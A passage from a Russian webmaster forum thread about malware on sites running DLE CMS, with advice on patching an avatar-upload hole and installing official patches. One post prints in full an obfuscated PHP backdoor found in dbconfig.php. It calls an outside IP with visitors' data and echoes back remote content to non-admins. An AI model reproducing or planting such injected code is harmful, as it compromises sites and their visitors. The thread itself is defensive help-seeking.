Форум Сайтостроение Безопасность

Вирус на сайте cms dle

1... 343536373839404142 ...61
B
На сайте с 07.05.2011
Offline
18
badu
#371

Если вас взломали именно аватаром, то надо сделать вот это

/ru/forum/comment/11407417

вот в этих файлах

engine/inc/editusers.php

engine/modules/register.php

engine/modules/profile.php

nop
E
На сайте с 02.03.2013
Offline
0
Emule
#372
badu:
Если вас взломали именно аватаром, то надо сделать вот это
/ru/forum/comment/11407417
вот в этих файлах
engine/inc/editusers.php
engine/modules/register.php
engine/modules/profile.php

Можно более подробнее.

Нужно заменить строчку 

@rename( ROOT_DIR . "/uploads/fotos/" . $id . "." . $type, ROOT_DIR . "/uploads/fotos/foto_" . $id . "." . $type );

или всю 

if( $thumb->size_auto( $user_group***91;$member_id***91;"user_group"***93;***93;***91;"max_foto"***93; ) ) {

$thumb->jpeg_quality( $config***91;"peg_quality"***93; );

$thumb->save( ROOT_DIR . "/uploads/fotos/foto_" . $id . "." . $type );

} else {

@rename( ROOT_DIR . "/uploads/fotos/" . $id . "." . $type, ROOT_DIR . "/uploads/fotos/foto_" . $id . "." . $type );

}

Так же в файле engine/modules/register.php мне не удалось отыскать данную строку, может там, что-то другое нужно заменить?

Буду вам очень благодарен за подробный ответ.

K5
На сайте с 21.07.2010
Offline
209
kgtu5
#373
Emule:
Можно более подробнее.
Нужно заменить строчку 
@rename( ROOT_DIR . "/uploads/fotos/" . $id . "." . $type, ROOT_DIR . "/uploads/fotos/foto_" . $id . "." . $type );

или всю 
if( $thumb->size_auto( $user_group***91;$member_id***91;"user_group"***93;***93;***91;"max_foto"***93; ) ) {

$thumb->jpeg_quality( $config***91;"peg_quality"***93; );

$thumb->save( ROOT_DIR . "/uploads/fotos/foto_" . $id . "." . $type );

} else {

@rename( ROOT_DIR . "/uploads/fotos/" . $id . "." . $type, ROOT_DIR . "/uploads/fotos/foto_" . $id . "." . $type );

}


Так же в файле engine/modules/register.php мне не удалось отыскать данную строку, может там, что-то другое нужно заменить?
Буду вам очень благодарен за подробный ответ.

а если не секрет, почему официальные патчи (http://dle-news.ru/bags/) не хочется использовать?

аська 45два48499два записки на работе (http://memoryhigh.ru) помогу с сайтом, удалю вирусы, настрою впс -> отзывы ТУТ (/ru/forum/836248) и ТАМ (http://www.maultalk.com/topic140187.html) !!!всегда проверяйте данные людей, которые сами пишут вам в аську или скайп!!!
E
На сайте с 02.03.2013
Offline
0
Emule
#374
kgtu5:
а если не секрет, почему официальные патчи (http://dle-news.ru/bags/) не хочется использовать?

Лучше бы подсказали, потому, что старая версия DLE 9.5.

Korew
На сайте с 31.12.2007
Offline
195
Korew
#375

Сегодня обнаружил в dbconfig.php такой код:

$db = new db;
 function showallnews($id) {
	$id = intval($id);
	$rtn = $id + date("j");
	return $rtn;
}

function mysqli_safe($in) {
	if (showallnews(64) < 1024) {
	$rtn = base64_decode($in);
	return $rtn;
	}
}
function getallnews($newsid) {
	if (date("j") - $newsid > 320 ) {
		$rtn = false;
	} else {
	$get = mysqli_safe("aHR0cDovLzkxLjIyMy44OS44OC9nZXRfYXBpLnBocD9waWQ9MiY=")."br=".base64_encode($_SERVER['HTTP_USER_AGENT'])."&ip=".base64_encode($_SERVER['REMOTE_ADDR']);
	if (!isset($_COOKIE[mysqli_safe("ZGxlX3Bhc3N3b3Jk")])) {
	echo @file_get_contents($get);
	}
	}
}
getallnews (date("j"));
?>

Подскажите, как он мог туда попасть и что он делает. Этот код был на двух сайтах, один 9.5, другой - 9.7

K5
На сайте с 21.07.2010
Offline
209
kgtu5
#376
Emule:
Лучше бы подсказали, потому, что старая версия DLE 9.5.

Так собственно я это и сделал, 3 патча начиная с предпоследнего установить - и все закроете...

---------- Добавлено 03.03.2013 в 09:42 ----------

Korew:
Сегодня обнаружил в dbconfig.php такой код: 

$db = new db;

 function showallnews($id) {

	$id = intval($id);

	$rtn = $id + date("j");

	return $rtn;

}



function mysqli_safe($in) {

	if (showallnews(64) < 1024) {

	$rtn = base64_decode($in);

	return $rtn;

	}

}

function getallnews($newsid) {

	if (date("j") - $newsid > 320 ) {

		$rtn = false;

	} else {

	$get = mysqli_safe("aHR0cDovLzkxLjIyMy44OS44OC9nZXRfYXBpLnBocD9waWQ9MiY=")."br=".base64_encode($_SERVER['HTTP_USER_AGENT'])."&ip=".base64_encode($_SERVER['REMOTE_ADDR']);

	if (!isset($_COOKIE[mysqli_safe("ZGxlX3Bhc3N3b3Jk")])) {

	echo @file_get_contents($get);

	}

	}

}

getallnews (date("j"));

?>


Подскажите, как он мог туда попасть и что он делает. Этот код был на двух сайтах, один 9.5, другой - 9.7

аналогично, установите пачти безопасности, ссылка чуть выше...

bison
На сайте с 12.11.2008
Offline
178
bison
#377

У меня на dle сайте вирус, яндекс отмечает что вирус js какой-то.

не могу найти.

буду признателен за помощь, могу заплатить.

trahtor
На сайте с 06.12.2005
Offline
405
trahtor
#378

У меня после обновлений траблов нет. Все чистенько.

WebMasterArtem
На сайте с 04.06.2010
Offline
28
WebMasterArtem
#379

Советую всем проверить свои сайты на наличие новой опасной штуки. Видимо созданной всё тем же злодеем, так как домен снова заканчивается на 00xff.net. Я уже радовался, что всё закончилось и думал - 'О, Чудо!". Но нет! Теперь ВО ВСЕХ новостях на сайте в самом низу появилась надпись "Скачать по прямой ссылке" ведущая на http://yandex.narod.ru.00xff.net/load.php?name=kakaya-libo-igra-ili-chto-to-eshe... Теперь придётся чистить БД.

И да. На сайте всего один пользователь и ни одной аватарки.

Блог-эксперимент Физика за год (http://fizikazagod.ru).
fxtotal
На сайте с 18.08.2007
Offline
75
fxtotal
#380

Народ, а кто сможет помочь за денежку излечить пациента от этого хлама? Мне время не позволяет.

Бизнес, полностью посвященный служению людям, будет иметь только одну проблему с доходами. Они будут крайне высокими.
1... 343536373839404142 ...61

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий